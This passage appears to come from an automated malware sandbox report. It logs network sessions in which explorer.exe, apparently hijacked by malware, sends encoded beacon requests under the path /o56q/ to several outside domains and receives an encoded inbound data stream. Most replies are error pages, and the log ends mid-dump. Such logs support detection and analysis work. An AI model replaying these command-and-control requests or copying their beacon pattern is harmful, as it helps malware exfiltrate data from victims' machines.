Nov 20, 2020 20:13:47.824343920 CET	1059	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Nov 20, 2020 20:13:47.824366093 CET	1061	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Nov 20, 2020 20:13:47.824382067 CET	1062	IN	Data Raw: 54 2b 76 50 36 71 7a 4a 4c 38 6a 49 6d 56 38 74 4c 35 42 70 70 6c 34 4b 4d 79 4c 52 30 53 6c 45 57 53 55 6b 79 45 70 57 55 32 53 59 72 7a 53 46 56 62 6d 5a 55 6e 39 6d 67 4a 73 6e 73 2f 39 59 4a 4a 53 66 31 36 42 78 45 71 67 65 4a 47 69 52 61 6b Data Ascii: T+vP6qzJL8jImV8tL5Bppl4KMyLR0SlEWSUkyEpWU2SYrzSFVbmZUn9mgJsns/9YJJSf16BxEqgeJGiRakKhDohWJejVmCgoZuPbCdbWci9RCpCaQWopUC1I5Vo+KwuY9EkFjK+Pn7Pgp943g2wHJmCJexrmFW8wMM3hgTsiI2WOlDmDVN8dYv07qeXcakOmkHUd/Je1qJH5IHealUa6ivUYq8aNJpvH6mDmiyswfsF1SOfqTZC
Nov 20, 2020 20:13:47.824397087 CET	1063	IN	Data Raw: 30 6f 33 36 79 6e 57 48 74 55 67 6d 41 6c 73 76 78 65 41 43 50 46 30 67 33 38 72 32 67 44 2f 53 44 51 54 41 66 4c 41 53 4c 51 41 49 73 42 6b 76 42 63 70 43 55 69 34 69 77 67 51 67 76 4a 4d 4b 7a 59 63 30 52 34 51 56 45 4f 45 79 45 72 35 55 7a 32 Data Ascii: 0o36ynWHtUgmAlsvxeACPF0g38r2gD/SDQTAfLASLQAIsBkvBcpCUi4iwgQgvJMKzYc0R4QVEOEyEr5Uz2NkJcJ60SQ5M0j8fvExWEnWDSoARGVajUkO0jUTbRbSNRNslyp4ghV7I9xB+1OJ3TKKwBkDLQkZUCrBZZpwmggxeZ5kbkhZ8SGFrEKaL4Q/hr4c/hL9eqmHqkQBoRjFZDlObY4rDFIPJg6kSJg8mvJYY3nqwwCAhul
Nov 20, 2020 20:13:47.824414968 CET	1064	IN	Data Raw: 54 54 5a 74 48 65 6a 7a 36 4f 49 4a 6c 47 67 56 4a 6e 33 33 36 6b 2b 6c 6a 64 57 73 4f 4f 75 76 44 50 7a 5a 70 45 4c 4c 45 4a 76 65 6f 73 4d 77 39 4c 74 42 54 47 4c 48 43 74 52 46 47 30 4b 49 39 73 4c 45 61 4c 4a 4e 6a 6d 53 4c 4c 64 4b 62 4f 4f Data Ascii: TTZtHejz6OIJlGgVJn336k+ljdWsOOuvDPzZpELLEJveosMw9LtBTGLHCtRFG0KI9sLEaLJNjmSLLdKbOOBjxD5sWdZ2frGDS4ymqvMUCL/AUczyLicVtGpIF+E9M3uBN/kqNUzzNUxziKc7xb/7Dv2lRosCzuBSxOcg1Duh54VMwuksOk0LWTCioLMZSVi4YHYLt8EWLX+a5jSV45U3Bq1lRsK1mUlG5kMUpCKw15oaxSvZzUt
Nov 20, 2020 20:13:47.824434042 CET	1066	IN	Data Raw: 31 69 75 4f 48 4a 65 4e 34 38 66 32 2b 4b 4c 4f 6b 53 51 47 46 69 74 78 6d 58 61 36 58 30 6a 6c 58 6e 4f 63 77 50 6a 6d 78 73 37 35 4f 6c 77 4c 58 52 56 65 34 71 63 37 6b 4a 34 67 53 4c 69 6b 4c 68 2f 65 49 57 63 44 69 6f 4d 69 33 5a 54 57 61 47 Data Ascii: 1iuOHJeN48f2+KLOkSQGFitxmXa6X0jlXnOcwPjmxs75OlwLXRVe4qc7kJ4gSLikLh/eIWcDioMi3ZTWaGocqAaE+t4m21f+m62DcVdpbcY8ek4hAUZGijXjL9b3EwlrdruaGO1s8EJfERgjVnrTxM1cgzZnjim/5FBpXxzmIQxlHbJ+UVUWFHH16H8gnvLSPmCizWviQum7sRlOQuVlY7+uLrI/PSucu+5TnKT9aSerjVgdlZQ
Nov 20, 2020 20:13:47.824450016 CET	1067	IN	Data Raw: 56 72 56 37 31 61 31 44 44 47 74 55 43 4c 64 49 53 4c 64 4e 79 72 64 52 71 72 64 56 36 62 64 52 6d 62 64 55 4a 2b 6d 33 39 6a 67 37 71 73 45 37 55 55 62 31 48 50 30 51 4d 6b 61 64 49 69 54 49 74 74 4e 4b 67 6a 58 59 6d 4d 5a 6b 70 54 47 55 61 63 Data Ascii: VrV71a1DDGtUCLdISLdNyrdRqrdV6bdRmbdUJ+m39jg7qsE7UUb1HP0QMkadIiTIttNKgjXYmMZkpTGUac1jFatbxSxzjT/lb/Y3O0Jk6XxfqEr1Gr9fVul436RY9oIeTXJJPSklzUk8aSXvSkfQkg8kQIkeeuRzkJL0rKSa9yShiAWkyFMZ2rlClRgvTmTG24xrv+Cv8Ooc5kb/0vn+lv/bef6uTdYpO1Wk6XWfrXJ0Xexa8a9
Nov 20, 2020 20:13:47.824465036 CET	1068	IN	Data Raw: 6c 4a 4b 61 63 6a 6e 77 32 38 51 65 6d 79 68 2b 61 43 6e 39 75 79 6b 53 79 59 76 6f 72 59 76 72 70 6d 48 34 68 70 74 38 58 30 31 64 4d 76 78 44 54 37 34 76 70 4b 36 61 76 6d 48 36 69 53 4a 6b 75 30 41 58 55 64 4b 45 75 70 45 55 58 36 53 4c 71 75 Data Ascii: lJKacjnw28Qemyh+aCn9uykSyYvorYvrpmH4hpt8X01dMvxDT74vpK6avmH6iSJku0AXUdKEupEUX6SLqulgX06pLdAkNXapLadNluox2vUKvYI1eqVeyS6/Sq1irV+vVrNNr9BrW67V6LRv0Or2OjXq9Xs8mvUFvYLPeqDeyJe5Xk67W1YzqGl1DSdfqWkZ0na5jWNfrembpBt3ATN2oGxnSTbqJZt2sm5mhW3QLc3SP7mGr7t
Nov 20, 2020 20:13:47.957201004 CET	1070	IN	Data Raw: 6a 36 2f 58 49 65 6b 4d 2f 31 41 38 70 49 4a 4a 6b 4d 58 4d 41 6d 42 45 4b 61 2b 4c 54 51 76 4c 41 41 41 33 58 49 48 31 4d 41 72 61 79 6e 69 33 4d 5a 6a 47 62 32 63 67 6d 51 36 7a 70 72 4b 55 66 45 4d 52 53 36 48 41 6f 67 4d 59 71 52 5a 6f 4d 54 Data Ascii: j6/XIekM/1A8pIJJkMXMAmBEKa+LTQvLAAA3XIH1MArayni3MZjGb2cgmQ6zprKUfEMRS6HAogMYqRZoMTWQZIccoRFJhG7CMlZQouypU/XmVWcnqSGnJVXYtZy4d8X+nJfSygrEV55+41jGZGtBg3T/8W3S8m4yt/uMYQvxDS+OAyIyRA1aybAKlcVYRxPlL4+DqGKOXla5+lo2XKE0oKI9V6e+VqE4oWDlWq/7BGnbBSpYCqy

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49727	66.235.200.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:13:53.322623968 CET	1138	OUT	GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1 Host: www.myreviewandbonuses.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49728	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:13:58.907588005 CET	1139	OUT	GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1 Host: www.thrust-board.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:13:59.024359941 CET	1139	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 20 Nov 2020 19:13:58 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c9ca-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49730	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:14:04.137047052 CET	1144	OUT	GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1 Host: www.teelinkz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:14:04.252129078 CET	1150	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 20 Nov 2020 19:14:04 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c4ff-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49731	23.227.38.64	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:14:09.341078043 CET	1173	OUT	GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1 Host: www.not-taboo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:14:09.492538929 CET	1175	IN	HTTP/1.1 403 Forbidden Date: Fri, 20 Nov 2020 19:14:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 166 X-Sorting-Hat-ShopId: 47446032551 X-Dc: gcp-us-central1 X-Request-ID: 3810f865-43d3-46ae-836c-35de5bfd2af3 X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC cf-request-id: 0688ad194300002bc2c6a9d000000001 Server: cloudflare CF-RAY: 5f547e086c722bc2-FRA Data Raw: 61 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 Data Ascii: af4<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-ite
Nov 20, 2020 20:14:09.492562056 CET	1176	IN	Data Raw: 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72 65 6d 20 32 2e 35 72 Data Ascii: ms:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color
Nov 20, 2020 20:14:09.492577076 CET	1177	IN	Data Raw: 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a 20 7b 0a 20 20 20 20 Data Ascii: nt-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "Adgang
Nov 20, 2020 20:14:09.494324923 CET	1178	IN	Data Raw: 39 32 39 0d 0a 42 65 72 65 63 68 74 69 67 75 6e 67 20 66 c3 bc 72 20 64 65 6e 20 5a 75 67 72 69 66 66 20 61 75 66 20 64 69 65 73 65 20 57 65 62 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 69 74 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 Data Ascii: 929Berechtigung fr den Zugriff auf diese Website" }, "it": { "title": "Accesso negato", "content-title": "Non hai lautorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-ti
Nov 20, 2020 20:14:09.494349003 CET	1179	IN	Data Raw: 74 6c 65 22 3a 20 22 45 72 69 c5 9f 69 6d 20 72 65 64 64 65 64 69 6c 64 69 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 42 75 20 77 65 62 20 73 69 74 65 73 69 6e 65 20 65 72 69 c5 9f 69 6d 20 69 7a 6e 69 6e 69 7a 20 Data Ascii: tle": "Eriim reddedildi", "content-title": "Bu web sitesine eriim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "con
Nov 20, 2020 20:14:09.494360924 CET	1179	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49742	65.254.250.119	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:14:52.037756920 CET	4669	OUT	GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1 Host: www.tnicholson.design Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:14:52.143873930 CET	4670	IN	HTTP/1.1 404 Not Found Date: Fri, 20 Nov 2020 19:14:52 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:03:34 GMT Accept-Ranges: bytes Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49743	192.64.147.164	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:14:57.519289970 CET	4671	OUT	GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1 Host: www.sabaicraft.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:14:57.684051991 CET	4672	IN	HTTP/1.1 404 Not Found Date: Fri, 20 Nov 2020 19:14:57 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.8 Set-Cookie: session=321b2d73e8965a770dd31776b723b317; expires=Fri, 20-Nov-2020 19:44:57 GMT; path=/ Vary: Accept-Encoding,User-Agent P3P: CP="CAO PSA OUR" Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 31 Dec 2001 7:32:00 GMT Content-Length: 844 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 74 6d 6c 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 52 45 43 2d 68 74 6d 6c 34 30 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 73 61 62 61 69 63 72 61 66 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 76 61 6c 75 65 3d 22 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 38 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 24 28 64 6f 63 75 